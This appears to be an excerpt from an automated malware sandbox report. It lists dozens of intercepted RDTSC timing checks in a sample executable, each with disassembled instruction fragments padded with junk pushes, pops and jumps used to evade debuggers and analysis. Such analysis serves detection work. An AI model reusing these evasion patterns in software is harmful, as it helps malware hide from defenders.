              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 103E941 second address: 103E94C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F335931F146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 103E94C second address: 103E955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 103E955 second address: 103E95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F335931F146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10458AA second address: 10458B8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F335854CBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10458B8 second address: 10458F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Dh 0x00000007 jl 00007F335931F146h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jnc 00007F335931F15Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1045724 second address: 1045730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F335854CBB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10486AF second address: 10486B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10486B5 second address: 10486EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007F335854CBC9h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jbe 00007F335854CBB6h 0x0000001c pop eax 0x0000001d popad 0x0000001e pushad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10486EB second address: 1048703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F335931F14Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1048703 second address: 104871C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1049E73 second address: 1049E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F155h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1051817 second address: 105181C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1051EB6 second address: 1051ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F335931F151h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1051ECC second address: 1051EE8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F335854CBBCh 0x00000008 jns 00007F335854CBB6h 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 105208A second address: 1052094 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F335931F146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10521F0 second address: 10521F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1052CB8 second address: 1052CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10729A0 second address: 10729A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10729A4 second address: 10729C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F335931F15Dh 0x0000000c jmp 00007F335931F157h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 108797E second address: 1087982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1087AC7 second address: 1087ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1087ACC second address: 1087AD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1088197 second address: 10881A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jg 00007F335931F148h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10881A6 second address: 10881AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10881AC second address: 10881B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884AE second address: 10884BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884BA second address: 10884BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884BE second address: 10884C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884C2 second address: 10884C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884C8 second address: 10884EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F335854CBB6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F335854CBC4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884EE second address: 10884F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884F2 second address: 1088504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1088504 second address: 108850E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F335931F146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 108850E second address: 1088528 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1088528 second address: 1088538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F335931F146h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1088538 second address: 1088542 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F335854CBB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 108B4D3 second address: 108B500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F335931F14Eh 0x0000000c jmp 00007F335931F151h 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F335931F146h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 108B500 second address: 108B504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 108F92C second address: 108F9B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F157h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc edx, 16120EBAh 0x00000012 push dword ptr [ebp+122D2102h] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F335931F148h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 call 00007F335931F150h 0x00000037 xor dword ptr [ebp+122D2D6Eh], edi 0x0000003d pop edx 0x0000003e call 00007F335931F149h 0x00000043 pushad 0x00000044 jmp 00007F335931F155h 0x00000049 push eax 0x0000004a push edx 0x0000004b je 00007F335931F146h 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 108F9B4 second address: 108F9D5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F335854CBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F335854CBC2h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 108F9D5 second address: 108FA1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F150h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnl 00007F335931F14Ah 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007F335931F151h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f je 00007F335931F154h 0x00000025 pushad 0x00000026 jc 00007F335931F146h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1091325 second address: 109132E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 109132E second address: 1091334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1090EBF second address: 1090EC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1090EC5 second address: 1090EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F335931F14Ah 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1090EDA second address: 1090EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1090EE2 second address: 1090EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA7718 second address: FA771C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA771C second address: FA7722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA7722 second address: FA7733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBBDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA7733 second address: FA7737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA7737 second address: FA7746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA7746 second address: FA774C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA7902 second address: FA7906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FA7906 second address: FA792D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jnc 00007F335931F146h 0x00000013 pop ebx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BC0438 second address: 4BC043D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BC043D second address: 4BC0443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BC0443 second address: 4BC0498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007F335854CBC2h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007F335854CBC3h 0x0000001c xor ah, FFFFFFDEh 0x0000001f jmp 00007F335854CBC9h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BC0498 second address: 4BC04EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov eax, 0A909033h 0x00000012 pushfd 0x00000013 jmp 00007F335931F158h 0x00000018 add eax, 65E3B838h 0x0000001e jmp 00007F335931F14Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ecx, dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BC04EB second address: 4BC04EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BC04EF second address: 4BC04F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BC04F3 second address: 4BC04F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF06C6 second address: 4BF0738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F335931F155h 0x00000009 and eax, 67D0B126h 0x0000000f jmp 00007F335931F151h 0x00000014 popfd 0x00000015 jmp 00007F335931F150h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e pushad 0x0000001f mov dh, 33h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F335931F158h 0x00000029 xor ah, 00000028h 0x0000002c jmp 00007F335931F14Bh 0x00000031 popfd 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0738 second address: 4BF077D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F335854CBC8h 0x00000008 xor ecx, 1D986788h 0x0000000e jmp 00007F335854CBBBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F335854CBC0h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF077D second address: 4BF078C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF078C second address: 4BF0792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0792 second address: 4BF0796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0796 second address: 4BF07B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F335854CBBBh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF07B9 second address: 4BF07BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF07BE second address: 4BF07EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F335854CBC6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF07EF second address: 4BF07F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF07F3 second address: 4BF07F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF07F9 second address: 4BF07FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF07FF second address: 4BF0803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0803 second address: 4BF0845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F335931F14Eh 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 mov si, E1B9h 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F335931F152h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0845 second address: 4BF085A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF085A second address: 4BF0886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F335931F151h 0x0000000a and ch, FFFFFFE6h 0x0000000d jmp 00007F335931F151h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0886 second address: 4BF088C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF088C second address: 4BF0890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0890 second address: 4BF08AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F335854CBC2h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF08AF second address: 4BF08B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF08B5 second address: 4BF08B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF08B9 second address: 4BF0962 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a call 00007F335931F154h 0x0000000f mov ecx, 682ADA71h 0x00000014 pop esi 0x00000015 pushfd 0x00000016 jmp 00007F335931F157h 0x0000001b sub eax, 441234DEh 0x00000021 jmp 00007F335931F159h 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esp], eax 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F335931F14Ch 0x00000032 or ax, 14D8h 0x00000037 jmp 00007F335931F14Bh 0x0000003c popfd 0x0000003d push eax 0x0000003e push edx 0x0000003f pushfd 0x00000040 jmp 00007F335931F156h 0x00000045 xor ax, DF38h 0x0000004a jmp 00007F335931F14Bh 0x0000004f popfd 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0962 second address: 4BF0978 instructions: 0x00000000 rdtsc 0x00000002 mov cx, E16Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov eax, 1C718F67h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF09C8 second address: 4BF09F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F335931F14Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF09F6 second address: 4BF09FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF09FC second address: 4BF0A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 4BF0A00 second address: 4BF0A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
